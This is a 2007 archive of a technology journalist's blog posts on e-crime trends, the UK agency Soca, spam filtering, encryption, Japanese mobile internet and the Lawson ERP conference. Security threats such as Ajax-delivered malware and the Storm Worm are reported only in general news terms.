The fact that e-crime is no longer a hobby but a profession has been repeated so often now that it no longer makes for attention-grabbing headlines. But it's always interesting to see what the crims are up to next. Accodring to Yuval Ben-Itzhak, CTO of web security firm Finjan, the apeing of traditional business models in the shady world of e-crime continues apace. Finjan researchers have uncovered instances of affiliate marketing-style operations, where webmasters are encouraged to embed Trojans or other malicious code on their site and are paid per click-through, or poor unfortunate who might land on that site. Nice.

More research from the firm uncovered the use of Ajax, that darling technology of the Web 2.0 world, in order to obfuscate the downloading and execution of malware fom a remote server. Because the technology enables requests to be made to remote servers without the need for any visual change to the user's screen, or need to click on any elements, it can all be done behind the scenes. This means that just by visiting a page, your PC could be infected. Right, that's enough security talk for one week. Next week, back to the Hoff.

March 30, 2007 | Permalink | Comments (0)

The debate about Soca rages on. The trail had gone a little cold, until a raft of stories came out this week on the back of a few comments made by director general Bill Hughes and Sharon Lemon, head of the e-Crime Unit, yesterday. They admitted it had been a struggle in the first year to assimilate all the disparate agencies comprising the organisation, and that Soca is still falling short of having a "long-term impact on organised crime", but hit back at accusations that it was not handling online crime effectively.

Yet a recent forum of retail fraud managers by 192.com Business Services has revealed these concerns are still very real. The forum was set up first last year as a means for fraud managers to share best practice and information on how to deal with attacks on their organisations, including presentations by the fuzz, MPs and even an ex-fraudster, who is now studying to be a lawyer (lots of transferable skills I suppose). Fraud managers can often be IT managers, depending on the organisation, as such a large part of the job involves dealing with phishing or screenscraping or other methods of online crime.

Again, according to 192's David Pope, a major gripe of fraud managers is that when they come to report fraud, the process is frustratingly slow and arduous. The will is clearly there to make an example out of these criminals and send a strong message, but it's not among the local police force's major concerns, and Soca's remit is organised, often globally organised, crime. According to Pope a lot of retailers lamented the NHTCU's priorites being realigned within Soca and there are even potential moves within the Met to set up a national e-crime coordination centre to bring together local forces. Other ideas to shore up this apparent hole in fraud reporting include a Home Office initiative of a National Fraud Reporting Centre…but we all know how long 'initiatives' take to set up.

March 29, 2007 | Permalink | Comments (0)

It was back to Victoria today for the annual E-crime Congress, where the great and the good gathered to hear from a selection of the world’s top e-criminals, sorry e-crime experts, about the latest on the subject. From a reporting perspective it’s usually worthwhile as it makes a refreshing change from the Infosec hell of vendor self-interest stories. There’s always fair spattering of government, law enforcement and cyber crime  gurus from around the world, although in recent years, us filthy hacks have been banned for most of the sessions bar the opening keynote on each day. But, thankfully, members of press received a note from the organisers informing them that they were free to "circulate through the exhibition and coffee areas at will". Phew, thought I was going to actually miss something important.

In the end the talk focused on phishing and online fraud, and what Soca is doing around e-crime, which it has been given a hard time about since the world-renowned NHTCU was subsumed into its gargantuan frame. Director general Bill Hughes and e-crime head Sharon Lemon acknowledged to their credit that there is still a long way to go in terms of outreach to the industry and forming alliances globally – a vital part of the fight against internet-related crime. But Hughes was more bullish when defending his organisation against some of the criticism – or rubbish, as he called it – that has been written about it in the press, mainly about it not taking e-crime as seriously as the NHTCU did. I can't comment on what goes on inside Soca, because, as they're not bound by the Freedom of Information Act, they can be rather impenetrable, but this criticism has certainly not been dreamt up by the press…I have personally spoken to businesses who are disappointed at the level of engagement and the outreach currently being made by Soca.

A lot of the time these conferences are basically just a lot of people with different opinions contradicting each other, which makes for very 'he said, she said' stories. There was a bit of that here: Joseph Sullivan from PayPal said web hosters should be encouraged to take down phishing sites earlier, perhaps with Good Samaritan legislation which negates them from any legal liability. Others said 'are you mad? What about those countries that don't want to push through this kind of legislation?'. Which is true; there'll always be small gaps in the global fight against e-crime somewhere, and that's all there needs to be.

Which brings us on to another theme – education. Again, there were proponents, specifically William Beer, European director of Symantec's Security Practice, who said the education message needs to be tailored more to individual groups in society, like the elderly, or teenagers. He also noted that current advice on phishing often ignores the new forms of the social engineering-based attack including SMS phishing, and voice phishing, the latter being when a fraudulent phone number is included at the bottom of an email, which users are encouraged to call instead of clicking on a dodgy URL. Then of course, others, like F-Secure's Mikko Hypponen, and PayPal's Joseph Sullivan occupied the pessimist's view and maintained that no amount of education is going to do anything to stop online fraud. Better stop writing; getting a bit depressed now…

March 27, 2007 | Permalink | Comments (0)

I know you're all probably sick of spam by now. I don't mean the unwanted messages clogging your inboxes, riddled with malicious links and with tempting offers of pills and powders and advice on stocks and shares. I mean the vendors who keep harping on about their solutions being the best at stopping this new epidemic of spam…well, to be honest, it doesn't seem anyone's is that good, because there's still an epidemic, isn't there? It's slowing down corporate networks as in-house systems are overwhelmed by the number and size of newer, image-based spam messages...or so they say.

Most traditional filters are unable to detect this new breed of spam and block it effectively because those clever spammers manage to make thousands of variations, each with one tiny fraction of the images altered, so that the new message sails clean through. So what to do? German web hosting firm Strato thinks it has the answer with its fingerprinting technology. Developed in partnership with the Institute of Computer Technology at the Humboldt University Berlin – boffins, white coats, you get the picture – and a certain Professor Scheffer of the Max-Planck-Institute – uber boffin - this technology works by not trying to identify every detail in a picture, but assessing the percentage of a certain colour in a specific tone, or by "the composition or structure of individual graphics", according to Strato. It then decides the probability of that spam mail coming from the same sender as another, and is therefore able to block it. Identifying similar but not identical characteristics in this way gets around those pesky spammers' ploy to bypass filters by changing minute details of the image.

Another key feature is called social graphs, which looks at the relationships between senders and receivers of mails and decides if a message being sent to your inbox is likely to have come from a particular sender. If this probability is low, chances are it is spam. There's more on the way from these clever Germans too, apparently, but I was not privy to that information when we met this week, because the patents have yet to be filed. It all sounds very exciting though…a self-learning spam filter with personalised filters for individuals.

March 23, 2007 | Permalink | Comments (1)

Just been sitting down with web hosting firm Strato, who've launched a new e-commerce arm to their services. Makes sense…the market is potentially huge for this and many smaller firms are looking for an easy way to get their slice of it. Strato is offering three Webshop packages starting at beginner at working up to something appropriate for a failry large mid-sized retailer. It’s key differentiator seem to be simplicity of set-up and configuration and also nice little features like the ability to cross-sell on products with an also-boughts function – although a few offerings in this space are offering this now…it’s all about keeping up with the Amazon’s.

It’s also offering an interface with UPS for shipping, although you can also use other shippers if you want, and the ability to shift your stuff on eBay. The Webshops have also been apparently optimised so that Google’s spiders can find your shop more easily, although as what Google’s spiders do is beyond mine and most people outside Google’s comprehension, I’ll just take Strato’s word for it on this. More likely to have an effect on your online stores visibility on the web is the ability to link your site to shopping portals like Kelkoo.

With over 20,000 Webshop customers already in Germany, Strato’s got history here; like its web hosting business, the firm is wisely moving into foreign markets only when it thinks the time is right. UK customers should benefit in that any early teething troubles Strato has encountered with the service should have been ironed out by now. And security fears should be allayed by the fact that its got SSL encryption – although not as yet a facility to provide the new Extended Validation version – and also that its servers are locked away in a very secure datacenter. Having visited the site myself I can vouch for the fact it is very well hidden away…I certainly wouldn’t be able to find it again.

March 21, 2007 | Permalink | Comments (1)

Data loss/breach/leakage has been on my radar again this week. I met encryption specialist PGP – which stands for 'Pretty Good Privacy', not ones to blow their own trumpet, as you can see – and worked on a couple of vendor research-type stories which highlight the problems IT managers are facing with lost and stolen corporate information. The trick is to find a way of ensuring only the right people send the right data out of your organisation, and if stuff gets lost on removable devices or laptops, making sure it's going to be useless to whoever finds it.

There is a reasonably simple answer to all of this – encryption, but it's still primarily the concern of early adopters only, according to the analysts. I get the impression a lot of firms think that encryption equals PKIs, laboured implementation and management headaches, although the truth is somewhat more simplistic: Seagate has even started manufacturing hard disks with encryption capabilities baked-in. And the stakes are pretty high these days for data breaches, as each reputation-diminishing headline proves.

PGP is an unusual company in that it began life selling solutions to enable human rights organisations to communicate safely via email, according to the press blurb, and founder Phil Zimmerman is certainly a passionate advocator of civil liberties. He told us how the original technology was designed with hacking threats from enemy governments in mind…all very cold war-Harry Palmer stuff if you ask me. But they soon realised that the evolving business landscape and the changing nature of threats provided a natural fit for encryption solutions.

We also had a good old rant about ID cards and the potential infringement of civil liberties that could occur if more efficient ways to log, control and police the population are found. "People are always talking about making things more efficient," said Zimmerman. "But if the job of the police is made really easy then basically you've got a police state. Things would be 'more efficient' if the police had total access to all your information all the time." Which is a fair point, as was another that was made – that any ID card system set up today could be abused by the government of tomorrow, or next week, or next century.

There was also a bit of a debate about the need for encryption on VoIP traffic. As the world gradually switches over to Voice over IP networks, the threat becomes more obvious – the criminals have an excellent opportunity to hack in and create havoc leveraging information gleaned from conversations. Blackmail, extortion, ID theft, the list goes on…but there is a solution.

March 15, 2007 | Permalink | Comments (1)

When it comes to the land of the rising sun, the clichés are almost endless. The futuristic Blade Runner-city scapes, the achingly polite but frustratingly inscrutable locals…and those weird toilets with heated seats. Technologically Japan has also stolen a march on the west in many areas, most notably in the area of mobile services, to the extent that European operators looking to predict the success or otherwise of new mobile internet services will often look east in lieu of a crystal ball. That’s what a new piece of research by Forrester’s Niek van Veen says, anyway.

And he’s right, Japanese mobiles put the west to shame. Apart from being lighter, smaller and cooler, over half the population uses one to access the internet, and not just for email either but more advanced services like travel information or location-based search. Case in point, my mate's band is looking to sign a deal with a large music label over there at the moment, but an absolutely key part of the deal is the percentage of music downloads the band will be paid. Now that wouldn't matter so much over here, but in Japan a major slice of revenue comes from mobile downloads – and I don't mean crazy frog ringtones – due to their popularity.

According to the report, the readiness to accept internet on-the-go in Japan was perhaps driven by the fact that SMS was originally unavailable over there. Which is true, but there are other cultural factors at play which also explain the success of the mobile net there, such as the large amount of time most Japanese commuters spend on public transport, not in the car, when they are free to use their phones. And it is without doubt the nation where to have the latest set, or be signed up to the latest service, is the primary signifier of success, cool, status etc.

According to van Veen, European firms hoping to take some pointers from the Far East and accelerate take-up over 'ere should concentrate on providing a long tail rather than a closed wall environment – the more content, and choice, the better. He also recommends social media sites as a way of luring consumers onto the mobile web, and finally location-based services like search, reservation bookings and so on. All common sense stuff which has so far eluded our mobile operators…in the meantime we'll just have to gaze enviously at the Far East.

March 14, 2007 | Permalink | Comments (0)

So, as it goes, there it went; Lawson's Cue event this year, a feast of ERP featuring major upgrades to its M3 applications, further commitment to the SOA cause with the incorporation of more IBM middleware into Lawson’s underlying technology layer, and a brand spanking new initiative designed to appeal to the corporate social responsibility (CSR) aspirations of many firms these days.

On the latter, Lawson probably has as good a chance as any vendor of success. Although its plans are rather vague at the moment, organisations are crying out for ERP apps and BI technology that can help them to drive through their own initiatives, whether environmentally or ethically focused. Judging by the customers, um, both of them, that I spoke to, they are pretty keen about Lawson’s plans. At the moment its larger ERP rivals having nothing similar to offer firms, although it would be foolish to rule anything out.

In the meantime, I reckon Lawson has a pretty good chance of capitalising on being the first and could raise its profile with potential customers. As the firm's Emea VP of marketing Martin Hill told me, mid-market firms are potentially more likely to be genuinely interested in these CSR projects, rather than seeing them as a mere publicity exercise.

March 11, 2007 | Permalink | Comments (0)

It’s interesting to see the evolving trends in the annual customer events that the heavyweight IT vendors throw. I remember Microsoft’s Convergence last year featuring some bizarre ethnic drumming combo in an effort to symbolise the coming together of enterprise applications, apparently. And the year before, at a Citrix event in Vegas (baby), CEO Mark Templeton bounded onto the stage in a pair of stonewashed denims, white t-shirt and possibly a baseball cap – although the mind plays tricks – to the strains of “Let’s get this party started” provided by a Citrix house band. Yeah, application acceleration…rock and roll y’all.

Obviously in a quest to go one better, or perhaps out of sheer boredom, Lawson Software’s numero one guy, Harry Debes, presented his opening keynote at this year's Cue event on Monday in a David Letterman-style mock studio, complete with leather sofa, house band (and accompanying witty repartee) and special guests. It was actually a fairly good rendering of the old Tonight Show in reality; terrible jokes, worse suits and a bunch of guests you’ve never heard of. And then a couple of penguins were thrust on stage alongside (probably) a Lawson employee inside a large furry whale suit. This sort of thing does nothing for the feeling of disorientation and uncertainty that comes after a 15 hour flight.

March 7, 2007 | Permalink | Comments (0)

Ah, welcome to America. Welcome to bags of crisps the size of the average human head, though maybe not the average American’s. Welcome to id checks for anyone buying alcohol who’s below pensionable age; to wrongly spelt words and staff that smile so hard they must all be on prescription drugs.

It is, of course, the home of Silicon Valley, the epicenter of the global technology industry, or one of them, if that’s possible. And home to to San Diego, which is where I’ll be most of this week sucking up Lawson Software’s annual Cue customer conference, and spitting out some nice little bitesized morsals of ERP news for you to consider. Hand on heart, it’s not the kind of subject that really gets the pulse racing is it? But Enterprise Resource Planning, and all the technology that goes along with it is vitally important in helping firms improve their efficiency, boost revenue and productivity. It’s no wonder that the two largest ERP specialists out there, SAP and Oracle, are also two of the largest software companies in the world too.

As a generalist in this game, I’ll be keen (I really will, honest) to find out what Lawson have got to offer enterprises that the big boys can’t, what they’ll be doing in terms of new products this year, and finding out what their customers think. That’s the idea anyway – wish me luck.

March 5, 2007 | Permalink | Comments (0)

For all of you out there that studiously try to avoid the pompous self-important ramblings of most bloggers out there, here's another good reason; the Storm Worm. No, it's not the name of some new military armoured personnel carrier, but a new variant of a worm which first emerged in January. This time the crafty little bugger has been designed to install multiple files including a Trojan on users' PCs when they click on an email link, open an attachment or visit a malicious site. When said user then comes to write his or her blog or contribute to a bulletin board, the Trojan will insert a malicious link into the text somewhere.

According to Donal Casey of IT and business consultancy Morse, firms should educate employees as to what they should or shouldn't be clicking on. But of course, this little attack has been deliberately focused on the area of blogs and bulletin boards because, just as with social networking sites, there is a kind of assumed safety in the whole community aspect of these sites. People think no-one can, or would want to, penetrate their cosy extended circle of peers and cause mischief. So the only real way of mitigating against these threats, as Casey said, is either blocking these sites altogether, or ensuring your enterprise has the appropriate content security technology that can detect these kind of malicious links and either block access to the site or remove the content before the page is loaded.

March 1, 2007 | Permalink | Comments (0)